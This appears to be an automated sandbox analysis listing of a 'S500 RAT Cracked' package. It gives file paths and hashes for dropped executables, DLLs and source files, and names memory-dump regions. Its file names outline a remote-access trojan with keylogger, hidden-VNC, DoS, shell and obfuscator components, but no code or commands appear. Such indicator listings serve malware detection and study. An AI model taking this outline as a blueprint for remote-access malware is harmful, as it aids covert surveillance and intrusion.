C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props
| MD5 | 3108edc3f74d08bec485f1fc0aabab5b |
| SHA1 | e1e14322ab3e69a69a7b0c9efd5b845a112320b8 |
| SHA256 | e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584 |
| SHA512 | 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets
| MD5 | 3d9ef7c4c2db6e7631832825418a9ba6 |
| SHA1 | b2ac00b06d61c8498914ea52eaedaab01fae1a21 |
| SHA256 | 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7 |
| SHA512 | 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035 |
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 27ca366a1d5c573827ffe735774b3948 |
| SHA1 | 3c5b461746dfe30be57c9645f0f306df22934a29 |
| SHA256 | 2b0cd717c200ba50563d065367955ecf4999dc708fcf80dd9862bb7a48672fab |
| SHA512 | 23ad694861f1a74afd8dd07bbc02f92b0a5fa5ba6b27eccd48d57ff415170f2187583dded882ec2ed9d390cab527ac5c8adedb9ae0d62021272626bbce6c92ee |
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 87ca06f69c513f4fbbf67c5b4e366210 |
| SHA1 | 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa |
| SHA256 | 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5 |
| SHA512 | 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb |
memory/1880-1252-0x00000000013D0000-0x00000000014F8000-memory.dmp
memory/1880-1253-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
memory/1880-1255-0x00000000004F0000-0x0000000000570000-memory.dmp
memory/1880-1256-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | aa2fc72b58059e5e7e9e7003ab466322 |
| SHA1 | e171576589134431baccb40d308e7dcbc776e087 |
| SHA256 | f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88 |
| SHA512 | 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef |
memory/2192-1259-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2192-1260-0x00000000012B0000-0x0000000002374000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll
| MD5 | 0f07705bd42d86d77dab085c42775244 |
| SHA1 | 7e4b5c367183f4753a8d610e353c458c3def3888 |
| SHA256 | cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443 |
| SHA512 | 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0 |
memory/2192-1261-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1263-0x000000001C5C0000-0x000000001C7B2000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
| MD5 | 604f8eb4afe0d9a9e3fb5f7981c09145 |
| SHA1 | 92d44f43b4c9fc84b99ba34c5abb3672725ecc69 |
| SHA256 | 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d |
| SHA512 | cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598 |
\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll
| MD5 | 9c43f77cb7cff27cb47ed67babe3eda5 |
| SHA1 | b0400cf68249369d21de86bd26bb84ccffd47c43 |
| SHA256 | f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e |
| SHA512 | cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7 |
memory/1360-1274-0x0000000000150000-0x0000000000182000-memory.dmp
memory/2192-1273-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp
memory/2192-1272-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/1360-1275-0x0000000074680000-0x0000000074D6E000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll
| MD5 | af527b22b92a23c38a492c5961cf2643 |
| SHA1 | 15106adfa13415287b3e9d8deba21df53cb92eda |
| SHA256 | 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a |
| SHA512 | 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c |
memory/2192-1277-0x000000001D010000-0x000000001D250000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
memory/2580-1279-0x0000000000400000-0x0000000000439000-memory.dmp
memory/1360-1281-0x0000000002020000-0x0000000002060000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | 8d1e09604f03d722a6203a50d13c476a |
| SHA1 | b5c43ff15b9a01346907e2c96936c1b855719b0e |
| SHA256 | 283504cf75629ea4958b2b3e34d1f4e072090d907ce2b829e0fafd4b7598d357 |
| SHA512 | 6d0eec952abed603a769830d8cef19fff751a207b411a905824585f219aa6f541ff1c84dfd423f7405ee4efdb92ac75e0e78667cb43e245cc48ad9185cb4f26e |
memory/2192-1283-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1285-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2028-1286-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1289-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp
memory/2028-1292-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1293-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2028-1291-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1294-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1290-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/2192-1295-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/2028-1296-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1297-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1298-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1299-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/1360-1300-0x0000000074680000-0x0000000074D6E000-memory.dmp
memory/2028-1301-0x0000000000C60000-0x0000000000C92000-memory.dmp
memory/2192-1302-0x0000000001280000-0x00000000012B2000-memory.dmp
memory/2028-1303-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2580-1304-0x0000000000400000-0x0000000000439000-memory.dmp
memory/2192-1305-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/1360-1306-0x0000000002020000-0x0000000002060000-memory.dmp
memory/2192-1307-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1308-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1309-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1310-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2192-1311-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1312-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1313-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/2028-1314-0x000000001C350000-0x000000001C3D0000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll
| MD5 | 3aaae3cec15b86693ae9fb8e1507c872 |
| SHA1 | ed8d0a139c609eb886482718ec2ecf96cbbe8c84 |
| SHA256 | a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b |
| SHA512 | 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463 |
memory/2192-1316-0x000000001BD70000-0x000000001BD7C000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12
| MD5 | c60e527a85f285ddc66c2fcf160b1be7 |
| SHA1 | abcf2b6bffea9f0f30190783f6eae2434ef7a9a8 |
| SHA256 | 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f |
| SHA512 | 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e |
memory/2192-1319-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1321-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1324-0x0000000031C80000-0x0000000031CBC000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll
| MD5 | 17cbdd9e4cb0ede2fad8c08c05fdaa84 |
| SHA1 | 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c |
| SHA256 | d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441 |
| SHA512 | 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a |
memory/2192-1322-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1326-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1325-0x000000001BD90000-0x000000001BE10000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
| MD5 | d5b77dfb5f248f3aabc560d8300088c5 |
| SHA1 | bbf7bb5f78051a59e725920cea3d54d1e7473cea |
| SHA256 | 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55 |
| SHA512 | 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552 |
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm
| MD5 | feb8d2de1663adc1e141b8f7bb95d6ac |
| SHA1 | a9b1c4d0f522515c940a80876876d782510cb421 |
| SHA256 | ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b |
| SHA512 | af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm
| MD5 | e6fad395145548f21929c4050a70d710 |
| SHA1 | 97a8780b8a3d25185f83f88c5f320384b4069601 |
| SHA256 | c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92 |
| SHA512 | 857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm
| MD5 | 1efa2056cd994a29fd0d2e983ef7b26e |
| SHA1 | 76967624574c43b1e22e9b3ec4ba17139b547633 |
| SHA256 | 1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d |
| SHA512 | edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm
| MD5 | 78f905ea7378410c450c79ceb3b9012b |
| SHA1 | 495f677fd305c78a77e8164f7de7d732e1aca35c |
| SHA256 | 50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a |
| SHA512 | ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm
| MD5 | be38b0526e6d40f44c7b62d8db2c9553 |
| SHA1 | 5c4c70ae1381b5e51a685f96700340832229c06d |
| SHA256 | f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f |
| SHA512 | 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm
| MD5 | e03eaf459f028cc6fa8669e277c1a17a |
| SHA1 | ea0a775e49e279208962a9179c974969a2cf7e5e |
| SHA256 | a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f |
| SHA512 | 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm
| MD5 | a54153cd522d951f6b360c3bd3de84d0 |
| SHA1 | 639dbc414f495044c2d705f39ac965212f1c8c30 |
| SHA256 | 195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa |
| SHA512 | 95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt
| MD5 | f7bbcdd86cbc1d6d0b81720ac1477fde |
| SHA1 | 4799c37f86be4dda105ed3468934f70c36339474 |
| SHA256 | 50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f |
| SHA512 | 2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt
| MD5 | 963be96779d4ef26360c2a3af3a53816 |
| SHA1 | 6991959998c9939e5ededa0d6759a715559c2140 |
| SHA256 | f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4 |
| SHA512 | 4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt
| MD5 | e9f329a48dcb70c6ad95c8ab8fe82eb0 |
| SHA1 | 45e25355e67fd2d528467b4117884ffb601552a3 |
| SHA256 | 5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637 |
| SHA512 | 62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4 |
C:\Users\Admin\Desktop\S500 RAT Source Code\readme.txt
| MD5 | 5983ea5e477d9bbd7751a1903e017762 |
| SHA1 | e472313990708995c479b50e8ff10c9e1140086d |
| SHA256 | ac9c17fb596e6ee68245d12ac63b9393c9c511fb3afe71448d5e5749cacca1ae |
| SHA512 | 5220c7d82a2c1e146ba22c00eb778e97fc19c34efb01a1412b4c7b52731dffb33cb0d5d11a2424d0152a6b61b50521a7dd6c320aa6792c791b88b9ba9a6c16a1 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Program.cs
| MD5 | d6b005305acfbe4587508dc3877294a9 |
| SHA1 | 38d568415346ff78acf79f0d518e7a8e9f6be959 |
| SHA256 | adfd734db6c4735f58bdbd5a5c4903f6a88de7b921c8d3c5a2da7e03bce29f3a |
| SHA512 | e7b52e740c572c8dcd9f4a94340dbdf85eed8bc85fd913345aa6835996b574dc7e5b489a4dbcc2fdc74db4a4a782836cac19943a9999747969a9ef9f252db330 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\App.cs
| MD5 | 53a1bc7f4a72237331ecb9aa01da8bd0 |
| SHA1 | 5b6c10f01e7379ff063df6fc9dfd64ce48155527 |
| SHA256 | 3b41c5acf029271942597465183c1cafbd1652775d4abb4ee249eb7e4823d3fa |
| SHA512 | 5ba23177fc0e4e239dee02ed4974dc22c3def9e4168bee0a0e3361e19a44529ead5ea4b9c82c1e0a321e5c3b959ec371d035b59e82c28fb2f2820ea966a12d01 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\ApplicationSettings.cs
| MD5 | bf517b0b3a45c9a9451e3656b20a9f52 |
| SHA1 | 51faa109422107d1573941da825203b3f92c362c |
| SHA256 | 5fb10237128d258baa75e30b8b9b48a29c369ab663f238b8539233da74816c5d |
| SHA512 | 45bdea0cb0eca0c6d225df6f04afcbd9938907d0c608d27bdfab41697b03c67c078d86a4185297d95fdc9f0b5bfaf60e9b0d6c4e580c48ea33d10b8094979456 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Constants.cs
| MD5 | 27a443d8293a5dbdcd20d66a5276f3d5 |
| SHA1 | d25303340a9a7641d8b1a94ac3e1754d28c0493d |
| SHA256 | 540d854b4e00858cd71a3744661b5040e81b9b230bd0ddc8ab4e8ddef96061d8 |
| SHA512 | a8ca338d9dd62a42f6d6055085cd5761e648f9cb579cda1268c88258800c87f7c05e5a936959c6b6ad8d5f6513b867fb50f3177de9eafc242f0ca06a94a23ed0 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Encryption.cs
| MD5 | 62c65acccd046b1e89a14a281c6838cb |
| SHA1 | f678a5a11db9de94e2bc3851dcdb5f2f66e79fb5 |
| SHA256 | 027631c1264c3aba3249e584d60f754527642b8df7fe0ffd41624e2a9631d7f6 |
| SHA512 | b5ca7cd5a5540201cbebc7bcf3c047bf2252f8c592df6475eb27dd6272a8566ede02dee299894a91466c56311b8432cc936a05a77bba3730dfbd905848932341 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\InfoManager.cs
| MD5 | 7788eff3b5d130358db1a9d5b5d94a86 |
| SHA1 | 156ec3c54a43031250f7281509870acad29c3e4f |
| SHA256 | f918c37ff46c7fa8139d6e1a721e10fda36ee80074388b356ec9f0aae090678f |
| SHA512 | 602211b0e1431a53b897188d045bbc9753238b47f8bdc52c0311391c3311cd7ad84b72be0ca6cd2086e3452f47b3cf832574bd048f3459ff6c7b929d2223aba2 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\User.cs
| MD5 | 590245612bc4e68a666b907a436d7e55 |
| SHA1 | 9c6e20ad5b6c43ebccb86db9251db4a68a2d766e |
| SHA256 | 9b0feb06f9af76fb63fd3231c5b00cb2fc6575bc64f82f9a3d477b43092a7a09 |
| SHA512 | f902edd07ca5b22e6626e9c670ac49436a4d938e4123b9762ed1ab35dea0f563e54dd79328c93cf61dbc554f85adde0a8bafbae14da71ee6432caefa6a3dabf0 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\BuildInfo.cs
| MD5 | a47f0eb84d4a844f6701449df7b49a5b |
| SHA1 | 26324a1ca64a5d20752018e95251cb3d071ade86 |
| SHA256 | dbc8c5d2d4a19ffda08dfa1ebec268ccd78b378ddf7a09d5f7d668d2010ec3be |
| SHA512 | 77dce702ee16c5d43901262ddea35c741c549c211471ac784e499a16839da68d59f74398b35ab1e28c6a8e888b0efc2a141f3c87e3659338709b7501ccc82c80 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\Utils.cs
| MD5 | b2e8e581082f57271651e8d9fe19a40b |
| SHA1 | 6d8af5b3b558f2d829b0da5ace4d4c67876cd290 |
| SHA256 | 331995f462b4d970a7c4f0556e53c7600973f40c8bcea6d8a72c5b40fc4f1598 |
| SHA512 | b550b382ec244cf4f52e8b4b156148aea06f6784ae9bfd7923ea7992a2e15604588efbfd732074c439da7d54d5b1a6838ae5aa0b4a17f432efc7fa523850d082 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FormAbout.cs
| MD5 | a17915e3f1f17ba1ceba3d59ffe503f1 |
| SHA1 | 5a0654c3c64613406a36dc0ac86889ca9e8422c3 |
| SHA256 | d4da167b054ca0bc40f2c060d3bbe5d4b43f90d1d41b722f1ea14273f7332f46 |
| SHA512 | 2b654e65214da976254b9400bfeda93365cb0681185b14b101dbb1e2f0ea87e20bc1790ef9c861128f2f3e6bbbe6036b330cb25eb17834c74cafa30204b16fa4 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmRec.cs
| MD5 | 1d772d1ef6b3ba72be0d41fb569e25ac |
| SHA1 | 196c0531b1122ed575af3d1deaa9498a9f01ed1f |
| SHA256 | 1fa6f6a85eccb1b84a1206cade3e9c1fbd152d3feb167abb009dd0df741e320a |
| SHA512 | dae5e1524d70592b1b025d964d4df918ab6a47650d0cfb4ccf21e3cf84982945e889077be613b67ed33a58985f56b410b3b94bbdd9dc5021b15455a0761789b5 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleChat.cs
| MD5 | fad096cd4f2dbb2e05c2994b5812cb13 |
| SHA1 | aa016fe79d20771b735af6e816b8675d9f319819 |
| SHA256 | 6ad8b6df50461c9587fcc97472b91cfaa28dba53fb0aaf15cda7140161ef3c9a |
| SHA512 | 9d4a4635de312d676ed4705bc17f76a91503339fa75908632fe8a31717c4f21007c25291f6b254c1e9a9eb85c8be70ec34932d115eb611f04c74fbf5354d8bb8 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFileSearcher.cs
| MD5 | 483622c17b2f1c7bcac04a8574aae2fe |
| SHA1 | 6896f388bb201d161c485fb20732d4f84c663d7e |
| SHA256 | f3f27c05bd7829d6883423ce7cba0e9719fb2ff0b661b5f64059eafb73611214 |
| SHA512 | bfc48dae2b88cd18051048c893c90a56626b317b834c8829bbcdbdc09d4ecea970102022d1c860b1bc447203f4a9798616157e290f8d1f0f97b8a0759a9a991d |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleDos.cs
| MD5 | 85b26983126bc8f4255f154f1b43026d |
| SHA1 | 289705d88a9d80b31614df3c6a1ed63a8e6e093f |
| SHA256 | ba959832e1815982aac245a02dc7189131ae297d3e71f0b79b401e4b9f83d07c |
| SHA512 | ffadd2c1de91f97dedcfb2da2cfba396352f84b47d31c735ef923f159452bc07a18bc49a22bf182b1d5f4849d4799a49a3ba2aa1325836f65a6b759150cc1b16 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleAudio.cs
| MD5 | e46826f22037990cdcbf2adf56a63ae1 |
| SHA1 | 806530956a20e6bb5cdb8321b2e8e9d762ffe158 |
| SHA256 | c14254a319d4575c45f2a3331f030629aafa990c8b1a6b28ece3cd326ac7b68f |
| SHA512 | 33df5e3cf704669ab97e78327ce4db6c6929e40e4f4b586a2f876e9d6c554a46751f7997561c518b0b53ec2361e1bcecfaef5389e71a28e31237a30fb37aeec3 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmTransfer.cs
| MD5 | 9250ace37a98aa75bbf0e7df7eadc6b4 |
| SHA1 | a9777df578a77416b04e95d36307e6e05b40e5ae |
| SHA256 | a4b88b97dbd6d32dbbb925ed4bbbac815e720a339f183cbeb812a3cb85a229c7 |
| SHA512 | 4ea1cc0d93a068ef6acd18cb43fcee156e44cede08eb89e23da1fbd18af55c81ccb1a1431d6b241aac85954f20e39a55710b8ee776e2f2d343327a791b1c83de |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFun.cs
| MD5 | ecfa94e4d1626b2d7b5fab42ba6eecff |
| SHA1 | b55b9d388c14dd5b7ccd51a1a6a5d969bdfee90f |
| SHA256 | 735f6018d61e7f65cf81b828e751bed543ffa76b187b57f3fdf8eb5e5d22d026 |
| SHA512 | 1870531cdf538cc6e4fbbe604cabdf00e8483f70b4e8da80717fb546eccb40415f735e85d7fd50ad658d80e247fa33b174072d2182bad983491ffa874f275606 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleHVNC.cs
| MD5 | 4a1d06f0d9fac5fb70a0322773a51f77 |
| SHA1 | 50e696781672593f8a3ab3149bc7b086a2cee31e |
| SHA256 | 9f2b07af21c52b1880a540294b12bfcf3a60744b0f139f8bfd6c7afbb2d0621c |
| SHA512 | 689ba12a4fd4c0cae9e85b31a2f0eeeadfe9f756f932f289e3fc4020b54525b165dcbc9fe11dab681c36612f60b93756bd3edf69fb174c8910f324f65f591512 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleKeylogger.cs
| MD5 | 66867585b21dad280d820d04def0edb6 |
| SHA1 | cb77bd7066df43851fa0c633b24a53ef3c079d87 |
| SHA256 | 802cf017ce9b4c065dd3cd9ba8e279127b4ba935bac1037541702e3c73dbf2b7 |
| SHA512 | e4c7d900738cea14ea01e31da594ff0e8bcf8487bf4387cfb8f78b00aff9aaeda51177cf060bcf259375810e097553a486192b618012e1272b3178206bcb98c8 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleInformation.cs
| MD5 | 993b8d7378d2249fbb6ce0d1fbd0caf2 |
| SHA1 | 48eba498f0b64cc1d9235389d68c671a818b2a27 |
| SHA256 | 460dbf36998b8d267b2b4f748428c3a06a027ce788cb28d73b64f82ece7e6a03 |
| SHA512 | aa94aa46b70cde920642e4e3294a3cb99825dd96c06855d76811ca81f805907a92abdcc89e5e1aa35fe4c8c598c63d7c8611a14894b7d6997ad60c53a5bcb8e5 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleProcessManager.cs
| MD5 | 6d2985668bda0e793da1c636775808ee |
| SHA1 | f54bf51f11a3b453592837d2e72790e2d0a285a6 |
| SHA256 | cde2ba5e1be41a86eaf359ff6d585677d722f1a7e92d962458f242f2f4517f75 |
| SHA512 | 7950c3c2e959ed91cd1cf5384eb78d7ef709a900a39e74be9482d17ed87f21f922f00d456999f2d344354f4932a9a34e96b3c08a0537b9e3265d0f2c1ab91843 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlerFileSearcher.cs
| MD5 | ebb5485590b79bdbf8ae79a63f83e6da |
| SHA1 | 021d5f7d2fe64073446efca70c9da3b47c37c59c |
| SHA256 | edb4185f0bdca89cbf2cebc72135e93a11913d99a3d167fef0bd84da57c3bd8c |
| SHA512 | 703729773fd015164d3792a0b726c3f227647dbe589c6105d0907de88d71ad93b4aad96c7b2d53716c9cf440b639fa0c51f1a91c3b88771edf658e05bc52c0a1 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleShell.cs
| MD5 | 02dfab19fe896b474e111c5438e1698c |
| SHA1 | 4fa009ab41770c7d5b2305a4a07e07167b375f0d |
| SHA256 | c8de8a4f8c8a5df94bc6a485a7440bc21966957f60fb301918af02408b5488cd |
| SHA512 | e92583725f85805471b3b55b6a9f6fa8bd31249780b9bd951ffe9b59cc5d2e35f362dac750db41181ab41f01c1b32a6666e9185fc5cf57001c129a2c7987644d |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleReportWindow.cs
| MD5 | 9764d1ac50cdb0b7212614208967d63f |
| SHA1 | 7f9ca9707db0d016ee3f285b4e2f7ee05228a8a0 |
| SHA256 | 2bb340f96986529f5c23cdbc51bfe04ded6a81f33c6c6e6d8df0b480b117898e |
